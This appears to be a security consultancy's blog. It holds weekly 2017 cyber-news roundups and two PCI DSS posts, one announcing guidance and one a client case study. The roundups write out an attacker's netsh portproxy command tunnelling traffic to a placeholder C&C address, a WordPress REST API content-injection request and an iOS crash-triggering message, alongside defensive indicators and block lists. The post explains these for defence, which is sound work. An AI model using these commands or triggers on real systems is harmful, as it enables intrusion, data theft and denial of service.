Saturday, February 18, 2017

Cyber Updates - 18/02

Hey all,
Here are this week's cyber updates:

(1) Microsoft has not published its famous Patch Tuesday this month due to "a last minute issue that could impact some customers and was not resolved in time". This is presumably due to their difficulties in fixing the latest SMB v3 vulnerability that was reported in the last "cyber updates" post. This means that all Windows machines are still vulnerable to a server side remote code execution exploit.

Here are their details:
https://blogs.technet.microsoft.com/msrc/2017/02/14/february-2017-security-update-release/

(2) Yahoo was hacked. No, this is not the same hack as in 2013 that was recently published, but rather a new hacking attempt. 
Instead of stealing the (hashed) passwords, this time the attackers have used forged cookies in order to login to the victims' accounts without their consent. 

Here are all the details:
https://help.yahoo.com/kb/SLN27925.html?impressions=true

(3) Security researches have been able to prove that websites can track your online activity even if you use a different browser. The websites perform unique tasks in order to pinpoint the following metrics: time zone, number of CPU cores, GPU, hash values of GPU rendering results, plugins, fonts, audio, screen ratio and depth, WebGL, Ad blocking, canvas, cookies, encoding, and language. According to the research, the attackers were able to successfully identify 99.2% of the users.

Here are all the details:
http://thehackernews.com/2017/02/cross-browser-tracking.html

Stay tuned for more updates,



Dan Gurfinkel
Head of Offensive Security & Response Unit

Saturday, February 11, 2017

Cyber Updates - 11/02

Hey all,
Here are this week's cyber updates:

(1) Microsoft Office allows its users to add a macro script to be executed when the document is opened. While this is usually used for formulas calculation, attackers have used it to execute malicious code on their victims' workstations, and in particular infecting them with ransomware (such as the Locky ransomware).
Today, the first Word macro for Mac OS was discovered. The malware downloads another file from https://www.securitychecking.org/index.asp and decrypts it (the file is encrypted using RC4 encryption). The malware then executes the decrypted file.

Organizations that use Mac OS systems are requested to check if any machines has queried the following malicious DNS record: www.securitychecking.org



(2) Numerous worldwide banks have been targeted by a malware stored only in the server's memory. Kaspersky reported to have their incident response team called due to a meterpeter code found in the memory of a bank's domain controller
What's interesting about this attack is the fact that the attackers have used the netsh.exe utility (builtin tool) in order to tunnel traffic from the victim's host to the attacker's C&C servers. In particular, the following command was used:

netsh interface portproxy add v4tov4 listenport=4444 connectaddress=<IP> connectport=8080 listenaddress=0.0.0.0

This caused the infected machine to listen on port 4444 and send this traffic to <IP> in port 8080. 
Thus, this has allowed a legitimate tool (netsh.exe) to be used in order to allow internal workstations and computers to communicate with an external C&C server, even if a direct communication channel between the internal machines and the internet is blocked by the organization's firewall.

Here are some artifacts generated in the Windows registry that will quickly allow an organization to determine if one of their machines was infected:


  • HKLM\SYSTEM\ControlSet001\services\ – path will be modified after using the sc.exe utility
  • HKLM\SYSTEM\ControlSet001\services\PortProxy\v4tov4\tcp – path will be modified after using the netsh.exe utility

(3) This has not been the best week (in terms of cyber security) for banks. Numerous Polish banks have been hacked, and the interesting part is that the source of the attack came from KNF - the Polish authority in charge of the safety and security of banks in Poland. Apparently, someone hacked KNF's website and has modified a JavaScript file to contain malicious data.

Clients are advised to block access to the following hosts:
  • sap.misapor.ch
  • www.eye-watch.in
  • 125.214.195.17
  • 196.29.166.218



(4) Last week I've mentioned the ransomware that targeted an hotel in Austria; this week it was IHG's turn to be infected by a malware. About 12 InterContinental point of sales machines have been hacked, allowing the attackers to gain credit cards data.

The following link lists all infected properties: https://www.ihg.com/content/us/en/customer-care/protecting-our-guests. Be sure to check if you've purchased anything there!


(5) 76 famous iOS application are vulnerable to MiTM attacks. Some are very popular, such as Snapchat. The app is vulnerable to MiTM attacks, allowing attackers to still your credentials (username and password).


Stay tuned for more updates,
Dan Gurfinkel
Head of Offensive Security & Response Unit

Friday, February 3, 2017

Cyber Updates - 03/02

Hey all,
Here are this week’s cyber updates.

(1) Windows 8 & 10 are vulnerable to a server-side memory corruption vulnerability (CVE-2017-0016) in the SMB service. The vulnerability allows attackers to conduct a denial of service attack (BSOD) and possibly even execute code on the remote machine.
Currently, Microsoft has yet to issue a fix for this vulnerability, and an exploit for this vulnerability is reported to be seen in the wild.
Please  restrict SMB traffic in the FW until a patch is issued by Microsoft.

Here are all the details:


(2) Guests of the Romantik Seehotel Jaegerwirt hotel could not enter their rooms as their keycard was not working, and some guests’ reservations were gone from the system. Apparently, the computers running the electronic key lock were infected with a ransomware.

If you ask me, this just shows you the difference between a generic attack and a target-driven approach. The attackers could have easily collected all guests’ credit card details for years, allowing them to earn much more than the paid ransom (1,500 EUR).

In this case, the hotel had to pay the ransom ASAP, as any other alternative would have ended up in very unhappy guests. But, I guess they are already used to it, as the very same hotel was hacked three times before this incident.
Now you think that the hotel would want to protect its systems and prevent such an incident from reoccurring. Well, the hotel management found a rather “creative” solution – they are considering switching back to actual door keys and locks instead of key cards and electronic locks.

Here are all the details:

(3) WordPress just patched their environment against 0-day vulnerabilities. One of their bugs existed in their REST API, allowing remote privilege escalation as well as content injection. Basically speaking, the exploit has allowed any unauthenticated user to modify all pages.
In particular, by calling to /wp-json/wp/v2/posts/123?id=456ABC, WordPress attempts to check if the user has permissions to edit post id 456ABC, and if they don’t’ the function exits. Since such a post doesn’t’ exist (post ids should be numeric), the code then calls to update_item, which should have failed again. However, update_item casts the parameter to an int, causing the value to be changed to 456. Now a malicious unauthenticated user can update item 456 (which is a valid and existing post).

Here are all the details:

(4) Netgear routers have been found to contain 31 different vulnerabilities, including unauthenticated password disclosure. While by default the admin interface is not publicly accessible, this vulnerability can be used by internal attackers to infect routers, and possibly allow a malicious entity to own a big botnet for DDoS attacks. Alternatively, the attacker can conduct MiTM attacks. Think about it the next time you connect to a Starbucks Wi-Fi network.

Here are the details:

Stay tuned for more updates,
Dan Gurfinkel
Head of Offensive Security & Response Unit

Thursday, February 2, 2017

New Official PCI SSC Guidelines - “Best Practices for Securing E-commerce”

The new PCI SIG guidance, “Best Practices for Securing E-commerce”, was published several days ago.

The SIG (Special Interest Groups) is a formal PCI SSC professional program that allows QSAs, merchants, vendors and basically every member of the PCI community to work together and contribute on specific PCI areas, that require clarification or additional guidance.

The SIGs always contain valuable information and are one of the best ways to keep close to PCI SSC, anticipate trends and be few steps ahead of our clients

I have included here the new supplement and also the email sent by Troy Leach (PCI SSC’s CTO) received by myself amongst all of the SIG participants- to show the spirit and team effort that went into this one.

You can see that Comsec is credited and acknowledged as always for the valuable contribution inside the published document for our contribution and participation.

Nadav.

Nadav Shatz, PCI QSA  
Managing Director
T: +44 (0)203 463 8727 I M: +44 (0)7788 533 344

Sunday, January 22, 2017

Cyber Updates - 22/01

Hey everyone,
Here are this week’s cyber updates:

(1) Comsec advises its clients to restrict network access from the organization, in order to prevent data leakage to a C&C server.
Recently, Google’s infrastructure was found to be used as a C&C “server”. These servers are usually whitelisted, and thus allow attackers to extract data from organizations.
The script sends and receives commands to and from Google Apps Script, Google Sheets, and Google Forms services. For each infected user a unique Google Sheets spreadsheet is dynamically created in order to manage each victim. The use of a legitimate third party service like this one gives the attacker the ability to hide in plain sight.





(2) Facebook has been hacked. While in the previous cyber updates post I wrote it about Google it wasn’t really Google’s fault, this time Facebook was really hacked.
The website was found to contain a remote code execution vulnerability in its ImageMagick parsing library (CVE-2016–3714).

In particular, Facebook contains an API that gets a URL as a parameter, surfs to an image stored on that URL and displays it back to the end-user. By using an image with the ImageMagick vulnerability in it, security researcher Andrew Leonov has shown Facebook how he could execute commands on the server, and extract their output via DNS tunneling.

(3) This has not been the week of Facebook. Hackers have also found that the Facebook voice messages are vulnerable to SSL Strip attacks.

In particular, Facebook CDN servers do not impose HTTP Strict Transport Security (HSTS) policy, hence permitting this flaw.


And here’s a PoC video: https://youtu.be/9y0cov6dHb4

(4) A new denial of service vulnerability was recently discovered in iOS.
In particular, anyone can crash your iPhone or iPad by just sending an emoji-filled iMessage.
All you have to do to trigger this attack is send an iMessage containing the following: A white Flag emoji, the digit "0" and a Rainbow emoji. Your victim’s iPhone will crash even if they didn’t open the message!

Here’s the PoC video: https://youtu.be/G0iPhSuiMpk?t=130

(5) The Donald being sworn for presidency can’t go without a cyber-attack.
A radio station in Louisville was hacked, causing it to play anti-Trump songs for nearly 15 minutes. The hackers, most probably used a software used for emergency broadcasts in order to override the program that was already on-air at the time of hack.



Stay tuned for more updates,
Dan Gurfinkel
Head of Offensive Security & Response Unit

Sunday, January 15, 2017

PCI DSS Optimisation -- Comsec's Award Winning PCI DSS Case Study!

“How I rebuilt organisational security strategy and BAU thanks to Comsec Group and PCI DSS”
Client story.

The client: “Fundgate” (pseudonym – the firm chose to be anonymous) - An online financial services provider.

Fundgate is a global financial and payment service provider, operating in more than 200 countries and serving millions of users around the world. It is considered as a global leader in the field of online payments and money transfer, a well-known and respected player in the online financial services industry.
As business evolved and developed, security threats and risks have also evolved and became part of the business landscape. At the same time the company has also developed a strong awareness and knowledge for information security, risks and threats for their business from the security perspective.
Fundgate is no stranger to security compliance and PCI DSS compliance in particular. Operating across the globe and working closely with the card schemes– the company was very quick to address and to adopt PCI DSS soon after it was published in 2006. The company has achieved PCI DSS compliance and has maintained PCI DSS compliance ever since.
One of the company’s core principals has always been support the business and create value for the business, with each function of the organisation. This includes IT, risk, HR, compliance, third parties and suppliers. Each of those functions should support and create value to the business.
Fundgate runs a large IT infrastructure to support the business and the product environment. The infrastructure consists of multiple product teams with fast paced DevOps application delivery with product silos that are very much product orientated as they are business focused.

Fundgate performed a market search and decided to meet with Comsec, a well-known and experienced QSA company as a result of re-evaluating their PCI DSS compliance framework.
This re-evaluation came as a result of concerns that PCI DSS compliance becoming less effective and in some cases even conflicting with the company IT and security framework. Through an internal assessment and market analysis, Fundgate discovered that the great amount of resources, time, energy and money spent on PCI DSS related solutions and activities has little justification and value and should be utilised more effectively.

After several discussions, Fundgate hired Comsec to take over its PCI DSS compliance programme and to “optimise” the compliance programme and efforts.


Phase 1: Initial Assessment
After a short period of working together, Comsec’s QSAs came to the conclusion that indeed, the company was on “auto-pilot” with regards to PCI DSS compliance and that a broad change with regards to PCI DSS compliance was needed and must be implemented to truly maintain their PCI DSS compliance at all times but more importantly – to address and protect against the security threats that the company was facing. Fundgate had to rethink information security, governance and PCI DSS compliance.
Amongst the issues that Comsec’s QSA team has identified:
-          Senior Management was not adequately involved with the PCI DSS compliance programme.
-          PCI DSS compliance is treated as an annual project, “snap-shot”, and not as a continuous process and effort.
-          Culturally, PCI DSS was considered as an unwanted practice, one that damages and slowing down the business.
-          During the years, there was a decrease of knowledge in the IT and security teams regarding the PCI regulation and the forming of the “auto-pilot” state and lack of involvement of senior management.
-          Changes were not addressed- services involving card data were not assessed properly, resulting in incorrect PCI DSS scope (in-scope/out-of-scope issues).
-          The client’s PCI personnel, were in many cases not synched with the security and IT team.
-          PCI DSS controls and processes were in many cases disconnected and separated from organisational information security controls and processes, rather than being integrated in the organisational security framework.
-          Operationally, many of the PCI DSS controls and processes were disrupting and slowing down other business processes like development, product release cycles and IT operations as a result from improper environments and processes management.
-          Security controls effectiveness was limited – they were only implemented and used in the PCI DSS environment (scope).

Phase 2: Implementation
After understanding the difficulties and issues surrounding PCI in Fundgate, Comsec’s QSA team proceeded to the next phase which is implementing PCI DSS compliance and controls in the correct way. Using 3 core values and principles that guide Comsec PCI QSA practice throughout its work:

Three areas of value to the organisation:
1.       Information Security Focus
o   Implementing and maintaining PCI DSS compliance not by addressing generic requirements and “filing the PCI checklist“, but understanding the business context, threats and risks and then designing and implementing the security controls, solutions and products that fits the environment and that would also fit the PCI DSS requirements.
o   “The big picture”: Holistic approach. Understanding that information security comes first and any compliance framework has to be aligned with the organisational IS strategy. Controls and processes integrate and coherent with the overall security and compliance framework of the entity by:
§  Multi-standard environment: Addressing other relevant security standards, regulations and frameworks the company is adhering to and aligning the PCI DSS framework accordingly.
§  PCI related BAU activities – security testing, change management, IT security and others, are aligned, applicable and cover the wider information security context. For example, penetration testing is not limited to PCI DSS environment and requirements, but to the also to other environments and standards, thus increasing the value of the single activity to the organisation.


2.       Cost-effectiveness
o   “Back to basics”- put an emphasis on the intent of the PCI requirements and security controls, and design suitable processes, not on products and tools. In many cases security controls can be implemented by using simple practices. In many other cases a manual approach to a security control or process can be faster, more effective and more cost effective than its automatic tool equivalent.
o   Solutions/products- remove unnecessary tools and products utilised as part of the PCI DSS controls/requirements. Those can have expensive costs and can be easily achieved using manual or open-source tools.
o   Scope reduction- through expert consulting, Comsec experienced QSA team was able to reduce the scope of the PCI DSS environment and requirements, offering greater flexibility with addressing requirements and suggesting compensating controls where possible, to assist with reducing costs and unnecessary work.

3.       Business Focus
o   PCI DSS compliance is part of organisational Information Security - which is part of the organisation business.
o   Security controls fit into the business and product environment.
o   Implementing information security business as usual practices that support the business and operations.
o   Financial services expertise and experience - Comsec has been working with all the leading financial and payment entities, including Visa and Mastercard, on their card data security programmes prior to the establishment of the PCI Security Standards Council, and in the early stages of formulating the guidelines later known as PCI DSS. This leads to unmatched experience and know-how in the financial services sector.



• Phase 3: Results and Client testimonials (anonymized)
“Comsec has been a true partner both for PCI DSS compliance and for Information Security”
·        Enabled my company to achieve not just to tick the box of the standards controls, but to design the right PCI DSS compliance framework for my organisation
·        Reduced costs of compliance and at the same time improve efficiency and effectiveness
·        PCI is no longer a burden on the company resources, but seen as an important tool to confront our risk and security threat environment.
·        Security makes sense now more than ever - security controls, solutions, products and processes work in harmony and are relevant to the requirements and the security threats.
·        Employees are involved in information security more than ever and actually understand the PCI DSS requirements.

·        Demonstrable best-in-class abilities in the business area under review
Throughout the project, Comsec demonstrated what is expected from a cutting edge leading consultancy.- Total partnership and commitment to the client objective –business, professional and operational. Comsec performed a PCI DSS scoping that includes the organisation’s business environment, internal processes and philosophy, to create a tailored PCI DSS compliance and framework that fits with the organisation principals and operations.
•  Clear project management and process reengineering expertise
Comsec has dedicated a senior experienced project manager (director level), with vast experience across hundreds of PCI related projects, and specific industry experience in the financial and online sectors. This comes from Comsec’s approach that PCI DSS processes and controls are not stand-alone and do not operate within a vacuum, and must consider the business, operational and even cultural aspects of an organisation. It is only from great experience, professional knowledge the two can be combined successfully.
•  Mastery of the latest technological solutions
Comsec’s QSA team for the project consisted of a top-level technical consultant, with the most updated knowledge of current security solutions and products.
•  Understanding of the very latest regulatory requirements
Additionally, Comsec’s lead QSA is an experienced consultant and auditor for many security standards and best practices- PA-DSS, PCI P2PE, ISO27001, COBIT 5, Data Privacy and more. Thus creating a broad vision of the regulatory environment.  
•  The successful delivery of a core strategic initiative / set of client objectives
Through expert consulting, Comsec’s experienced QSA team worked together with the client to achieve project targets while optimising the PCI DSS compliance process- including PCI DSS environment and requirements scope reduction, greater flexibility addressing the requirements and suggesting compensating controls where possible, to assist with reducing costs and unnecessary work.
•  On budget, on time
Comsec managed to reduce the annual budget associated with PCI DSS in the organisation by removing irrelevant products and practices from the framework and optimising the overall process and security controls effectiveness.
•  Successful integration with existing client infrastructure
Working together with Fundgate, Comsec successfully integrated PCI DSS compliance maintenance with the client existing IT & security operations governance framework. This was a complete re-engineering of the previous PCI DSS compliance framework, which did not work seamlessly into the organisational framework.
•  Access to the right technology partners for the job
Comsec helped the company compare and choose the right suppliers and products for the business.


Cyber Updates - 14/01

Hey all,
Here are this week’s cyber updates.

(1) I’m pretty sure most of you are aware of Google Chrome’s (as well as other browser’s) auto fill feature. This feature allows Chrome to automatically fill your personal information in websites in order to speed up registration processes.
What most of you don’t know is that hidden fields are auto-filled, and thus submitted to the website’s owner. This allows the website to collect personal information without the user’s consent.


If you didn’t understand this one, please let me know and I’ll send you a link to another website, with an example of stealing your credit card info J

(2) Cellebrite, the Israeli-based company that allegedly helped the FBI to hack the iPhone, was hacked.
The my.Cellebrite database has been hacked, allowing the hackers to extract over 900GB of customers’ data.


(3) The Brazilian government has accidentally twitted a link to a Google Drive Excel spreadsheet, which contained a list of plain text passwords for social media accounts (Facebook, Gmail, Twitter, Instagram and more).
It appears as if the tweet contained by accident a copy-paste link to the spreadsheet instead of the intended URL.

They really should be more careful with their tweets, but more than that, I couldn’t help but wonder why they didn’t enforce any permissions on Google Drive…


Stay tuned for more updates,
Dan Gurfinkel
Head of Offensive Security & Response Unit